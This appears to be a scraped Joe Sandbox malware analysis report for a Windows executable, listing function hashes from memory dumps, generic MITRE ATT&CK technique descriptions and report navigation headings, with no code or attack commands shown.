Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975fe93151fa0f97a8f824659d44b0d025cc9abe046a23437afab12889a8247d
Instruction ID: 328174fb3b2c17b08a4fb93c0676203370229e9e2654dc1c98637bc7fcf97e17
Opcode Fuzzy Hash: 975fe93151fa0f97a8f824659d44b0d025cc9abe046a23437afab12889a8247d
Instruction Fuzzy Hash: AE415B71A08A4C8FEB98EF98D455BEDBBB1FB59310F00816ED00DE7292DB75A485CB41

Function 00007FF848CF174D Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 290c7c29798378fe5a320b4a3eb86927a19540b6b5ebf9fd30461828e952263d
Instruction ID: b94506ba6113db39c0f92ddb1c82c2f7e1e038c160d814ac8a60606a6223a36e
Opcode Fuzzy Hash: 290c7c29798378fe5a320b4a3eb86927a19540b6b5ebf9fd30461828e952263d
Instruction Fuzzy Hash: 5131D36191EAC96FF78BE77848265BA7F90EF46690B0805FBD08DDB1D3CE0D58068315

Function 00007FF848D00982 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3deb858a1046e47563f99c471fef1196e8341cd33db5e92d3e2adc66b30a72d6
Instruction ID: c7aab5a466bb33d4c5dc9f93db335320c274c48326c118ceed5f609df52f7ae8
Opcode Fuzzy Hash: 3deb858a1046e47563f99c471fef1196e8341cd33db5e92d3e2adc66b30a72d6
Instruction Fuzzy Hash: 0A31C411B5E9856FE749B37C68123FD67C1EF867A0F5405BED049C32C7DD1D6806428A

Function 00007FF848D002DD Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac7ad325a3b18a9d0c76097bbe50714cab6f085aa89dfdbd817ae17dd8ff349
Instruction ID: 5c4acc6cbca893b6c74815e15861d95d1b52153f1d7862282c1a00be86686617
Opcode Fuzzy Hash: 3ac7ad325a3b18a9d0c76097bbe50714cab6f085aa89dfdbd817ae17dd8ff349
Instruction Fuzzy Hash: AB317051A5EAC56FE746B3B818272ED7BA1EF46290F4801FAE548C71D3DE1C2C05836A

Function 00007FF848CFC550 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 954338a395e1cc344fcfb4e52007e5f2c817f33f6ed3e6b2887ddc8402e6b6fa
Instruction ID: 17eb60229802719bd16849d98e5b844f6fcdde1b395191951373ff83fb7b3434
Opcode Fuzzy Hash: 954338a395e1cc344fcfb4e52007e5f2c817f33f6ed3e6b2887ddc8402e6b6fa
Instruction Fuzzy Hash: D121F213B0D5662AE351B37DB8011F96BE1EF813B2F184177D38C8A083CE19648A82ED

Function 00007FF848CFD835 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29f61d2d7f9a9fb64d3bf38ce510bcda9c7037f1ff62a008dc06e002d55ada58
Instruction ID: 92177be4dc9b80f18fe5cc9212d18a3d5f0baff588c2c9affd8e832f3a1bfd8c
Opcode Fuzzy Hash: 29f61d2d7f9a9fb64d3bf38ce510bcda9c7037f1ff62a008dc06e002d55ada58
Instruction Fuzzy Hash: 24212921A0EAC60FE3D5E77C5C5A2B57BD1DF866A1B0842FBC588C75E7CD0998058382

Function 00007FF848CFD574 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 448a03da2478eb7c90a9097c4f5741dacceddc6139d0a740610a7f90ec264868
Instruction ID: 92eb71a2c21b936772772b6caa78d2d6a15259bcbb5b9a7cc5d4b043a34b0a52
Opcode Fuzzy Hash: 448a03da2478eb7c90a9097c4f5741dacceddc6139d0a740610a7f90ec264868
Instruction Fuzzy Hash: 1821B694E5E0372DFB98F6A250A20FE25915F017C2F81143AF3AE491C38F0CB51865AE

Function 00007FF848CFCA40 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7116b8c68c6f03217a055bcc9cc916a90b6477032b42a47df0cf50e1680ae945
Instruction ID: f4abc5b63ac30605cac8d66c133d8573c97621ae21af51d12c26933fd265945f
Opcode Fuzzy Hash: 7116b8c68c6f03217a055bcc9cc916a90b6477032b42a47df0cf50e1680ae945
Instruction Fuzzy Hash: 45F01D5290E7E18FE75B977818651A07F705F03550F0E00EBC588DB1E7D90C6C889367

Function 00007FF848CFC535 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02865a84f7aae2de5d4aaa29f094c805d709c5a6505dfd7a566a47fcdadde072
Instruction ID: 8ef0c6e17ff0cbbafa853d008f65cd63328f854f5fe0f2757d0bf26324507f71
Opcode Fuzzy Hash: 02865a84f7aae2de5d4aaa29f094c805d709c5a6505dfd7a566a47fcdadde072
Instruction Fuzzy Hash: 4EF08252F0D6D60FF785E63C18691A82E81AF66290F8901FAD609CB1D3D919C8458245

Function 00007FF848CFCA29 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aab9a2ff73af65e899bb2eb77e46681ee3b373894172c42e269df3e9ed02fa6
Instruction ID: 011eafa0854affa55c4b5a383f8b0c05dc5a7d7d06e7f6f4aa7dd96ce04cc24c
Opcode Fuzzy Hash: 6aab9a2ff73af65e899bb2eb77e46681ee3b373894172c42e269df3e9ed02fa6
Instruction Fuzzy Hash: EBF08252F0D9B24FF7ECF57D28592F46580EB40A50F0840B6CA58C71D6D94D6DC8538A

Function 00007FF848D008C1 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d257f27a99c121b901e156a36a98e96a478385a9184c08feb2408bfb7abe7296
Instruction ID: aeb00186777b0497a2024e3e3fb89198ced8c3a6e42adf1eaa20a8f276b07841
Opcode Fuzzy Hash: d257f27a99c121b901e156a36a98e96a478385a9184c08feb2408bfb7abe7296
Instruction Fuzzy Hash: F2F0E220A5DA856BF34977BC68126F876C1EF44790F1800BCE149831C3CC0CA805529A

Function 00007FF848CFC878 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20b8d95a6bd14e747e78b8f4df2802f2b4f073d398c7cae15f08723c5503798d
Instruction ID: 858ae9a61b4b7df7be1486d7a61bf97f8883400db5e2088dc3a7f7d78c9f6ae5
Opcode Fuzzy Hash: 20b8d95a6bd14e747e78b8f4df2802f2b4f073d398c7cae15f08723c5503798d
Instruction Fuzzy Hash: 36E0E5A1F2C5950FF38CE138045A1792BC1DB99640F0501BDC05AC32D2DE08AC46528A

Function 00007FF848CFF456 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479d902875f0f9ceb6c405eb72df6bd9fe67578dc04d75b0f1483056c8fbab8f
Instruction ID: 390929fbb24aa52b172ee84e147f1ade17a5af480366977ea435d94afacaba12
Opcode Fuzzy Hash: 479d902875f0f9ceb6c405eb72df6bd9fe67578dc04d75b0f1483056c8fbab8f
Instruction Fuzzy Hash: 4AF0823094D68C9FDB42EB7488654EDBFB0EF05300F0440EBE544D7092EA3859488741

Function 00007FF848CFD101 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a2c4cbd29d36b00bfe3eb66ebb7f8ebe34abe6e09b01a0d2b590490223d863
Instruction ID: 6fcfd1d1a755691a0161138b62ea83a1049794cfb0b537bdc96e994c85334ee9
Opcode Fuzzy Hash: 43a2c4cbd29d36b00bfe3eb66ebb7f8ebe34abe6e09b01a0d2b590490223d863
Instruction Fuzzy Hash: 85E04FA284E6C10FE74293250C2E294BF90BF12261F4942FBD6848B5E3DA0C5889D725

Non-executed Functions

Function 00007FF848CFF869 Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

EL_H, xrefs: 00007FF848CFF941

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID: EL_H
API String ID: 0-2972355470
Opcode ID: d554deaff616136a0c9c3bde3ea303eb2f1e4b26f878da50c1da7b038e9616fa
Instruction ID: 9229586bad61d74728d407b1d230da0b16d54128176d15a3af5b504f5fc7b533
Opcode Fuzzy Hash: d554deaff616136a0c9c3bde3ea303eb2f1e4b26f878da50c1da7b038e9616fa
Instruction Fuzzy Hash: 9C91705055E9C46FE346E3B81C66AEA7FA2CF8B250B8C49FED0C99F0A3C50D64579342

Function 00007FF848CFFF7C Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

=L_H, xrefs: 00007FF848D00143

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID: =L_H
API String ID: 0-530646013
Opcode ID: a334cf69ad73966b358bd6f3bba4460ae013fc49c224dd8d8a26368d5177362c
Instruction ID: 2e44a9060659a62bf11a03992a031870cca9082ecfd2a9505657d9064347348a
Opcode Fuzzy Hash: a334cf69ad73966b358bd6f3bba4460ae013fc49c224dd8d8a26368d5177362c
Instruction Fuzzy Hash: E6916A9065E9C46FE346E3B81C26AEA6FA1CF4B21179C09FDD0C99F4A3C50D6407D38A

Function 00007FF848CF12FA Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

1M_^, xrefs: 00007FF848CF1301

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID: 1M_^
API String ID: 0-2690736931
Opcode ID: 85ef41139c41c7faaa97c1bfd646ccfe27dd790c927ab464f6b816f0aefa6161
Instruction ID: 7e818360a85a109881a8907c3474c060e20b3151a2c72cd50780bcfc391913f6
Opcode Fuzzy Hash: 85ef41139c41c7faaa97c1bfd646ccfe27dd790c927ab464f6b816f0aefa6161
Instruction Fuzzy Hash: 4D41A737A0D6D79FE747EB3C68950E87BA0EF432A5B0901F7C185CA093DA15B40B8799

Function 00007FF848CF12F8 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

1M_^, xrefs: 00007FF848CF1301

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID: 1M_^
API String ID: 0-2690736931
Opcode ID: ef1a64e466efbe2f84ed2266a5f15433aa2983d8ca1d3efbd90d40a5674a2a90
Instruction ID: 525ffd1326ffaa4e60460ec98478d0cf4276235f086fd08e37ad9de986f1f2cb
Opcode Fuzzy Hash: ef1a64e466efbe2f84ed2266a5f15433aa2983d8ca1d3efbd90d40a5674a2a90
Instruction Fuzzy Hash: 3141C727A0D6D79FE707EB3C68550E87BA0EF432A5B0902F7C185CA093DA15740B8799

Function 00007FF848CF1180 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4db937671c15a15968392e1b00c95dbfbd3d6792242d609a6fb805a7bb01788f
Instruction ID: 639c5b78fabe6a9445dbf0cd5cb53f8ee6311ac5b6887d9e4e37d0dffd8a645a
Opcode Fuzzy Hash: 4db937671c15a15968392e1b00c95dbfbd3d6792242d609a6fb805a7bb01788f
Instruction Fuzzy Hash: F2B1DD27B0E6969FD703BB7C78510E57B60EF432B6B1903B7C1888A093DA15644AC79D

Function 00007FF848CF11FA Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20675153e517b728697fb1a04c5c507e6045f8217d6b19d983e09523a395fb32
Instruction ID: 653a3046265b5cd2c00cbbd4b53fb32da1f9ab627ecfa7af77c5fd07b8e9fffe
Opcode Fuzzy Hash: 20675153e517b728697fb1a04c5c507e6045f8217d6b19d983e09523a395fb32
Instruction Fuzzy Hash: 0761A837A0D5A68FD706BB3CA8450E97B60EF423B6B1902B7C185CA083DA15744AC799

Function 00007FF848CF12D3 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eb858bd1a4f52586a2ff678d4130ec714aa8c130cedb74f7f075c9febdd25b4
Instruction ID: d7e54f4142e1e0763f834c5a6516bd516803677c0ce796d5fdd5f32c7eb7a479
Opcode Fuzzy Hash: 6eb858bd1a4f52586a2ff678d4130ec714aa8c130cedb74f7f075c9febdd25b4
Instruction Fuzzy Hash: EB41B727A0E6D69FE707EA3C68550E97F60EF432A5B0902F7C285CA093DA15740B8699

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report R5AREmpD4S.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Windows Analysis Report
R5AREmpD4S.exe